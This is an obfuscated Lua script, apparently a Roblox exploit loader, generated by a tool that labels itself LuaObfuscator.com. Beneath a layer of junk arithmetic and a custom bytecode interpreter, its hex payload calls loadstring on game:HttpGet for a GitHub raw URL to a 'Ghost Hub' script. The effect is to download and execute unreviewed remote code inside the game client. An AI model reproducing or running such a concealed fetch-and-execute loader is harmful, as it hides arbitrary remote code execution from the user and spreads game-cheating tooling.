--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v105=v5(v83,v19);v19=nil;return v105;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v84-(v84%((1809 -(282 + 595)) -(857 + 74))) ;else local v85=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and (1 + (1637 -(1523 + 114)))) or (0 + 0) ;end end local function v21() local v34=0 + (0 -0) ;local v35;while true do if (v34==((117 -(32 + 85)) -0)) then v35=v1(v16,v18,v18);v18=v18 + ((1045 + 21) -(68 + 997)) ;v34=1;end if (v34==(1271 -(226 + 1044))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (30800116 -14022900)) + (v41 * ((66838 -(802 + 150)) -(87 + (707 -444)))) + (v40 * (436 -(67 + (204 -91)))) + v39 ;end if (v38==(0 + 0 + (997 -(915 + 82)))) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;v38=3 -2 ;end end end local function v24() local v43=430 -(44 + 386) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1487 -(998 + 488))) then v46=2 -1 ;v47=(v20(v45,1 + 0 ,26 -6 ) * ((1140 -(116 + 1022))^(133 -101))) + v44 ;v43=1189 -(1069 + 118) ;end if (v43==(10 -7)) then if (v48==((766 -(745 + 21)) -0)) then if (v47==(0 -0)) then return v49 * ((0 + 0) -0) ;else v48=1 + 0 ;v46=0;end elseif (v48==(5043 -2996)) then return ((v47==(0 -0)) and (v49 * ((1 + 0)/(0 + (0 -0))))) or (v49 * NaN) ;end return v8(v49,v48-(1814 -(368 + 423)) ) * (v46 + (v47/((3 -1)^(163 -111)))) ;end if (v43==((5581 -4158) -(630 + 7 + 786))) then v44=v23();v45=v23();v43=3 -(2 + 0) ;end if (v43==(20 -(10 + 8))) then v48=v20(v45,80 -59 ,473 -(416 + 26) );v49=((v20(v45,102 -70 )==(1 + (1055 -(87 + 968)))) and  -(1748 -(760 + 987))) or (1 -0) ;v43=441 -(145 + 293) ;end end end local function v25(v50) local v51=0;local v52;local v53;while true do if (v51==(8 -(18 -12))) then v53={};for v91=1 + 0 , #v52 do v53[v91]=v2(v1(v3(v52,v91,v91)));end v51=6 -3 ;end if (v51==0) then v52=nil;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=1414 -(447 + 277 + 689) ;end if (v51==(2 -1)) then v52=v3(v16,v18,(v18 + v50) -(1818 -(1703 + 114)) );v18=v18 + v50 ;v51=703 -(376 + 325) ;end if (v51==(4 -1)) then return v6(v53);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0 + 0 ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do if (v54==(1692 -(209 + 1481))) then for v93= #"}",v23() do local v94=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v94==(2 -1)) then while true do if (0==v95) then v96=(function() return v21();end)();if (v20(v96, #".", #",")~=(1636 -(1373 + 263))) then else local v124=(function() return 1000 -(451 + 549) ;end)();local v125=(function() return;end)();local v126=(function() return;end)();local v127=(function() return;end)();while true do if (2==v124) then if (v20(v126, #"[", #"<")~= #".") then else v127[1 + 1 ]=(function() return v60[v127[2]];end)();end if (v20(v126,2 -0 ,2 -0 )== #".") then v127[ #"xnx"]=(function() return v60[v127[ #"-19"]];end)();end v124=(function() return 3;end)();end if (v124==(1387 -(746 + 638))) then if (v20(v126, #"xxx", #"gha")== #".") then v127[ #"http"]=(function() return v60[v127[ #"asd1"]];end)();end v55[v93]=(function() return v127;end)();break;end if (v124==(0 + 0)) then local v159=(function() return 0;end)();while true do if (0~=v159) then else v125=(function() return v20(v96,2 -0 , #"xnx");end)();v126=(function() return v20(v96, #".com",6);end)();v159=(function() return 342 -(218 + 123) ;end)();end if (v159==1) then v124=(function() return 1;end)();break;end end end if (v124==1) then v127=(function() return {v22(),v22(),nil,nil};end)();if (v125==0) then local v173=(function() return 1581 -(1535 + 46) ;end)();local v174=(function() return;end)();while true do if (v173==(0 + 0)) then v174=(function() return 0 + 0 ;end)();while true do if ((560 -(306 + 254))~=v174) then else v127[ #"gha"]=(function() return v22();end)();v127[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v125== #"/") then v127[ #"91("]=(function() return v23();end)();elseif (v125==2) then v127[ #"gha"]=(function() return v23() -((1 + 1)^16) ;end)();elseif (v125~= #"91(") then else local v179=(function() return 0 -0 ;end)();local v180=(function() return;end)();while true do if (v179==(1467 -(899 + 568))) then v180=(function() return 0 + 0 ;end)();while true do if (v180==0) then v127[ #"-19"]=(function() return v23() -(2^(38 -22)) ;end)();v127[ #".com"]=(function() return v22();end)();break;end end break;end end end v124=(function() return 2;end)();end end end break;end end break;end if (v94~=0) then else local v106=(function() return 0;end)();while true do if (v106~=0) then else v95=(function() return 603 -(268 + 335) ;end)();v96=(function() return nil;end)();v106=(function() return 291 -(60 + 230) ;end)();end if (v106==1) then v94=(function() return 573 -(426 + 146) ;end)();break;end end end end end for v97= #"/",v23() do v56[v97-#"|" ]=(function() return v28();end)();end return v58;end if ( #"|"==v54) then local v88=(function() return 0;end)();local v89=(function() return;end)();while true do if (v88==(0 + 0)) then v89=(function() return 1456 -(282 + 1174) ;end)();while true do if (v89==0) then v59=(function() return v23();end)();v60=(function() return {};end)();v89=(function() return 1;end)();end if (v89==(812 -(569 + 242))) then for v108= #"\\",v59 do local v109=(function() return 0 -0 ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109==(0 + 0)) then local v130=(function() return 0;end)();while true do if (v130~=0) then else v110=(function() return 1024 -(706 + 318) ;end)();v111=(function() return nil;end)();v130=(function() return 1;end)();end if (v130==(1252 -(721 + 530))) then v109=(function() return 1272 -(945 + 326) ;end)();break;end end end if (v109==1) then v112=(function() return nil;end)();while true do if (v110== #"[") then if (v111== #"]") then v112=(function() return v21()~=0 ;end)();elseif (v111==(4 -2)) then v112=(function() return v24();end)();elseif (v111== #"-19") then v112=(function() return v25();end)();end v60[v108]=(function() return v112;end)();break;end if (v110==(0 + 0)) then local v163=(function() return 700 -(271 + 429) ;end)();local v164=(function() return;end)();while true do if (v163==0) then v164=(function() return 0 + 0 ;end)();while true do if (v164~=(1501 -(1408 + 92))) then else v110=(function() return  #",";end)();break;end if (v164==(1086 -(461 + 625))) then v111=(function() return v21();end)();v112=(function() return nil;end)();v164=(function() return 1;end)();end end break;end end end end break;end end end v58[ #"xnx"]=(function() return v21();end)();v89=(function() return 1290 -(993 + 295) ;end)();end if (v89==(1 + 1)) then v54=(function() return 1173 -(418 + 753) ;end)();break;end end break;end end end if (0==v54) then local v90=(function() return 0;end)();while true do if (v90==0) then v55=(function() return {};end)();v56=(function() return {};end)();v90=(function() return 1;end)();end if (v90~=(1 + 1)) then else v54=(function() return  #"/";end)();break;end if (v90~=(1 + 0)) then else v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v90=(function() return 2;end)();end end end end end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[531 -(406 + 123) ];local v66=v61[1772 -(1749 + 5 + 15) ];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=(978 -(553 + 424)) + (0 -0) ;local v72= -(1323 -(1249 + 73));local v73={};local v74={...};local v75=v12("#",...) -(1146 -(466 + 679)) ;local v76={};local v77={};for v86=0 -0 ,v75 do if ((1284<3151) and (v86>=v69)) then v73[v86-v69 ]=v74[v86 + (2 -1) ];else v77[v86]=v74[v86 + (1901 -(94 + 12 + 1794)) ];end end local v78=(v75-v69) + 1 + 0 ;local v79;local v80;while true do local v87=0 + 0 ;while true do if (v87==(1 + 0)) then if (v80<=3) then if (v80<=(1 + 0 + 0)) then if (v80==(0 -0)) then local v113=0;local v114;while true do if (v113==((0 + 0) -0)) then v114=v79[116 -(4 + 110) ];v77[v114]=v77[v114](v13(v77,v114 + (585 -(57 + 527)) ,v72));break;end end else do return;end end elseif (v80>(1429 -(41 + (3004 -1618)))) then v77[v79[105 -(17 + 86) ]]=v63[v79[3 + 0 ]];else local v117=v79[2];local v118,v119=v70(v77[v117](v13(v77,v117 + (1 -0) ,v79[(22 -14) -5 ])));v72=(v119 + v117) -(167 -(122 + 44)) ;local v120=(0 -0) -0 ;for v128=v117,v72 do local v129=0 -0 ;while true do if ((v129==0) or (1850==1529)) then v120=v120 + 1 ;v77[v128]=v118[v120];break;end end end end elseif ((821<2123) and (v80<=(5 + 0))) then if ((902<2325) and (v80==(1 + 3))) then v77[v79[2]]=v79[5 -2 ];else v77[v79[67 -(9 + 21 + 35) ]]={};end elseif (v80<=(5 + 1)) then v77[v79[(6084 -4825) -(1043 + 214) ]]();elseif (v80==(26 -19)) then local v131=0;local v132;local v133;while true do if (v131==1) then v77[v132 + 1 ]=v133;v77[v132]=v133[v79[4]];break;end if (v131==(1212 -((1076 -(239 + 514)) + 313 + 576))) then v132=v79[5 -3 ];v133=v77[v79[583 -((1690 -(797 + 532)) + 219) ]];v131=(234 + 87) -(53 + 91 + 176) ;end end else local v134;local v135,v136;local v137;local v138;v77[v79[1 + (2 -1) ]]={};v71=v71 + (414 -(15 + 398)) ;v79=v67[v71];v77[v79[2]]=v63[v79[1205 -(373 + 829) ]];v71=v71 + (983 -(18 + 964)) ;v79=v67[v71];v77[v79[7 -(736 -(476 + 255)) ]]=v63[v79[2 + (1131 -(369 + 761)) ]];v71=v71 + 1 + 0 ;v79=v67[v71];v138=v79[2];v137=v77[v79[853 -(20 + 481 + 349) ]];v77[v138 + 1 + 0 ]=v137;v77[v138]=v137[v79[130 -(116 + 10) ]];v71=v71 + 1 ;v79=v67[v71];v77[v79[(1 -0) + 1 ]]=v79[741 -(542 + 196) ];v71=v71 + (1 -0) ;v79=v67[v71];v138=v79[2];v135,v136=v70(v77[v138](v13(v77,v138 + 1 + 0 ,v79[2 + (1 -0) ])));v72=(v136 + v138) -(1 + 0) ;v134=0 -0 ;for v155=v138,v72 do v134=v134 + 1 ;v77[v155]=v135[v134];end v71=v71 + (2 -1) ;v79=v67[v71];v138=v79[1553 -(1126 + 425) ];v77[v138]=v77[v138](v13(v77,v138 + (406 -(118 + 287)) ,v72));v71=v71 + (3 -2) ;v79=v67[v71];v77[v79[2]]();v71=v71 + (1122 -(118 + 1003)) ;v79=v67[v71];do return;end end v71=v71 + (2 -1) ;break;end if ((858<=2962) and (v87==0)) then v79=v67[v71];v80=v79[378 -(142 + 235) ];v87=4 -3 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403673Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F50726F78696D6974793335322F526F626C6F78536372697074732F726566732F68656164732F6D61696E2F47686F7374253230487562253230412Q6425323053637269707400094Q00087Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
